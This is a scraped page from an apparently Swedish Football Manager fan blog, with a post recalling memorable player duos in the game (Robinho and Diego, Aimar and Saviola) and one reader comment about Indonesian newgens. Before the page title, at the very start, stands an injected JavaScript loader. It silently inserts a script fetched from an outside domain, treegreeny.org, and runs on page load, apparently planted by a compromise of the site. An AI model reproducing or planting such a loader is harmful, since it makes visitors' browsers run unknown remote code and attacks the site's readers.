;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Lirare vi minns: Duos – FMSweden
Meny Stäng

Lirare vi minns: Duos

Det finns några spännande duos i spelet som enligt mig varit spelare man försökt knyta till sig. Tex hade vi 03-04 Robinho och Diego i Santos som både var exceptionella talanger i verkligheten och i spelet. Den brasilianska duon var svår att få loss och Santos krävde mycket pengar men om man lyckades så låg man alltid bra till.

Den andra duon som kittlade lite extra var också från Sydamerika. Det rör sig om River Plate som 2000 hade både Pablo Aimar och Javier Saviola. Det gick så långt att 9-åriga jag valde att spela med River Plate bara för att få ha båda två i laget.

Finns det några andra duos ni minns?

Please wait...

Liknande Inlägg

1 kommentar

  1. Moniola

    Nu är detta visserligen två newgens, men på min fm 19 save med Parma hade Indonesien(!) en helt makalös duo som höll absolut världsklass. Den offensive mittfältaren Fadly Santoso kom fram genom Inters akademi och gick sedan till PSG för knappa miljarden. Framför honom i landslaget lirade spjutspetsen Budiman Salilah från Tottenham. Gjorde 20+ mål för Bournemouth i Premier League innan flytten gick till Spurs. En rolig detalj var att varken Salilah eller Santoso var kapten i landslaget, utan någon helt random skitspelare från den Indonesiska ligan. FM när det är som bäst!

Lämna ett svar